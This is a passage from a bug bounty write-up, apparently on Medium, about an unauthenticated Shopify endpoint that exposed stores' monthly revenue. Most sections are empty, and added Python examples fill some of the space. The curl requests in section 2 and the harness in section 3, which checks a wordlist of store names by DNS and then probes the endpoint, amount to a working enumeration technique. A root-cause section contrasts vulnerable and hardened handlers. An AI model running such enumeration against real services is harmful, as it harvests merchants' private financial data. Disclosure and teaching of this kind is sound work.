How I gained access to revenue and traffic data of thousands of Shopify stores

Ayoub FATHI
Apr 15, 2019 · 11 min read

Index

1. Introduction


2. Almost Vulnerable

(sample data)
$ curl -s https://exchange.shopify.com/shops/$storeName/revenue_data.json
{"2018-03-01":102.81,"2018-04-01":13246.83,"2018-05-01":29865.84,"2018-06-01":45482.13,"2018-07-01":39927.62,"2018-08-01":25864.51,"2018-09-01":14072.72,"2018-10-01":2072.16,"2018-11-01":13544.78,"2018-12-01":26824.54,"2019-01-01":31570.89,"2019-02-01":18336.71}
$ curl -I https://exchangemarketplace.com/shops/$newStore/revenue_data.json
HTTP/2 404
server: nginx/1.15.9
date: Fri, 29 Mar 2019 20:28:18 GMT
content-type: application/json
vary: Accept-Encoding
vary: Accept-Encoding
x-request-id: 106906213c97052838ccaaaa54d8e438
/shops/$storeName/revenue_data.json

3. Getting da wordlist

; <<>> DiG 9.10.6 <<>> REDACTED.myshopify.com
<...>
REDACTED.myshopify.com. 3352 IN CNAME shops.myshopify.com.
shops.myshopify.com. 1091 IN A 23.227.38.64
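The two surviving technical pieces of this write-up are the DNS check above (a store's myshopify.com name CNAMEs to shops.myshopify.com) and the revenue endpoint from section 2 (200 with a month-to-revenue JSON body for a known store, 404 for a new one). The harness below is an added example, not the author's tooling: it wires those two checks into one pass over a wordlist, with the resolver and HTTP client injected so the block runs offline on constructed data. Everything beyond what the page shows is an assumption and is labelled as such in the code: that a non-existent store name does not produce the shops.myshopify.com CNAME, that the endpoint lives on exchangemarketplace.com (the page uses both that host and exchange.shopify.com), and the shape of a non-JSON failure. Only run a real resolver and client against targets you are authorised to test.

```python
"""Added example (not the author's tooling): wordlist -> DNS pre-filter ->
revenue endpoint probe -> per-store summary, with DNS and HTTP injected.

Assumptions, because the page does not state them:
  * a store name is "live" when <name>.myshopify.com resolves to a CNAME of
    shops.myshopify.com (the dig output shows this for one real store only);
  * the endpoint answers 200 with {"YYYY-MM-DD": number} for a known store and
    404 otherwise (the two curl exchanges in section 2).
"""
import json
from typing import Callable, Dict, Optional, Tuple

SHOPS_CNAME = "shops.myshopify.com."
REVENUE_URL = "https://exchangemarketplace.com/shops/{name}/revenue_data.json"  # assumed host

# Constructed sample data, shaped like the "(sample data)" response on the page.
SAMPLE_REVENUE = {
    "2018-03-01": 102.81, "2018-04-01": 13246.83, "2018-05-01": 29865.84,
    "2018-06-01": 45482.13, "2018-07-01": 39927.62, "2018-08-01": 25864.51,
    "2018-09-01": 14072.72, "2018-10-01": 2072.16, "2018-11-01": 13544.78,
    "2018-12-01": 26824.54, "2019-01-01": 31570.89, "2019-02-01": 18336.71,
}

# Fake resolver and fetcher standing in for dig and curl (constructed tables).
# Swap in e.g. dns.resolver / requests when running against an in-scope target.
FAKE_DNS = {"redacted.myshopify.com": SHOPS_CNAME}  # the one live store
FAKE_HTTP = {REVENUE_URL.format(name="redacted"): (200, json.dumps(SAMPLE_REVENUE))}


def fake_cname(host: str) -> Optional[str]:
    return FAKE_DNS.get(host.lower())


def fake_get(url: str) -> Tuple[int, str]:
    return FAKE_HTTP.get(url, (404, "{}"))


def store_is_live(name: str, cname: Callable[[str], Optional[str]]) -> bool:
    """DNS pre-filter: only names that CNAME to shops.myshopify.com get an HTTP
    request, so the wordlist can be large without hammering the endpoint."""
    return cname(f"{name}.myshopify.com") == SHOPS_CNAME


def fetch_revenue(name: str, get: Callable[[str], Tuple[int, str]]) -> Optional[Dict[str, float]]:
    """Probe the revenue endpoint for one store; None on 404 or an unusable body."""
    status, body = get(REVENUE_URL.format(name=name))
    if status != 200:
        return None
    try:
        data = json.loads(body)
    except ValueError:  # e.g. an HTML error page served with a 200
        return None
    if not isinstance(data, dict) or not all(isinstance(v, (int, float)) for v in data.values()):
        return None
    return {k: float(v) for k, v in data.items()}


def summarise(revenue: Dict[str, float]) -> Dict[str, object]:
    """Reduce the month->revenue map to span, month count, total and peak month."""
    months = sorted(revenue)
    peak = max(months, key=revenue.__getitem__)
    return {"first": months[0], "last": months[-1], "months": len(months),
            "total": round(sum(revenue.values()), 2), "peak_month": peak}


def enumerate_stores(candidates, cname=fake_cname, get=fake_get):
    """Run the wordlist through the DNS filter, then the endpoint; return hits only."""
    hits = {}
    for name in candidates:
        if not store_is_live(name, cname):
            continue
        revenue = fetch_revenue(name, get)
        if revenue:
            hits[name] = summarise(revenue)
    return hits


if __name__ == "__main__":
    for store, info in enumerate_stores(["redacted", "newstore", "does-not-exist"]).items():
        print(store, info)
```

The DNS step is what turns a blind path-guessing exercise into a targeted one: a myshopify.com label that resolves to the shared shops.myshopify.com CNAME is a real store name, so every HTTP request is spent on a candidate that can actually answer 200. The summary keeps the fields that make the impact concrete (span of months, total, peak month) rather than dumping raw JSON.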

4. A Fail

/shops/$storeName/revenue_data.json

5. The new approach


6. The exploit


Impact


Analysis of root cause
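The root-cause discussion did not survive extraction, so nothing here is Shopify's implementation or an account of their fix. What the page does show is the bug class: a curl with no credentials, keyed only on a store name in the path, gets that store's monthly revenue back. The following added example illustrates that class with a minimal vulnerable handler beside a hardened one. The store table, session table, header handling and handler signatures are all constructed for the illustration and are assumptions, not anything the page describes.

```python
"""Added example, not Shopify's code: the missing object-level authorization
that section 2's unauthenticated curl demonstrates, as a vulnerable handler
next to a hardened one. Data, session lookup and signatures are constructed
for the illustration (assumptions, not the page's or the vendor's design).
"""
from typing import Dict, Optional, Tuple

# Constructed data: store name -> (owner user id, month -> revenue).
STORES = {
    "alpha-goods": ("user-1", {"2019-01-01": 31570.89, "2019-02-01": 18336.71}),
    "beta-wares": ("user-2", {"2019-01-01": 920.10}),
}
# Constructed session table: bearer token -> user id.
SESSIONS = {"tok-alice": "user-1", "tok-bob": "user-2"}

Response = Tuple[int, Dict]


def revenue_vulnerable(store: str, headers: Dict[str, str]) -> Response:
    """Keyed only on the path segment: anyone who can name a store gets its
    revenue. This is the behaviour the page's curl shows (no credentials sent,
    full data returned); the headers argument is ignored on purpose."""
    if store not in STORES:
        return 404, {}
    _owner, revenue = STORES[store]
    return 200, revenue


def current_user(headers: Dict[str, str]) -> Optional[str]:
    """Resolve a bearer token to a user id; None when absent or unknown."""
    auth = headers.get("Authorization", "")
    if not auth.startswith("Bearer "):
        return None
    return SESSIONS.get(auth[len("Bearer "):])


def revenue_hardened(store: str, headers: Dict[str, str]) -> Response:
    """Authenticate first, then check the caller owns the store before reading
    its data. Unknown store and somebody else's store both answer 404, so the
    endpoint does not double as an oracle for which names exist."""
    user = current_user(headers)
    if user is None:
        return 401, {"error": "authentication required"}
    entry = STORES.get(store)
    if entry is None or entry[0] != user:
        return 404, {}
    return 200, entry[1]


if __name__ == "__main__":
    print(revenue_vulnerable("alpha-goods", {}))
    print(revenue_hardened("alpha-goods", {"Authorization": "Bearer tok-bob"}))
    print(revenue_hardened("alpha-goods", {"Authorization": "Bearer tok-alice"}))
```

The check that matters is the ownership comparison after the store lookup; authentication alone would still let any logged-in merchant read every other merchant's numbers. Answering 404 rather than 403 for a store the caller does not own is a design choice worth making explicit: it stops the authorization failure from leaking which store names are valid, which is exactly the enumeration the write-up built on.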

7. Timeline


My own opinion on Shopify decision

8. Takeaway

Always read the policy carefully, and reach out to the relevant team as soon as you have something, even if you are not confident it is a vulnerability.



Ayoub FATHI

Written by

Senior AppSec Engineer, Bug Bounty Hunter & I enjoy breaking things

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew
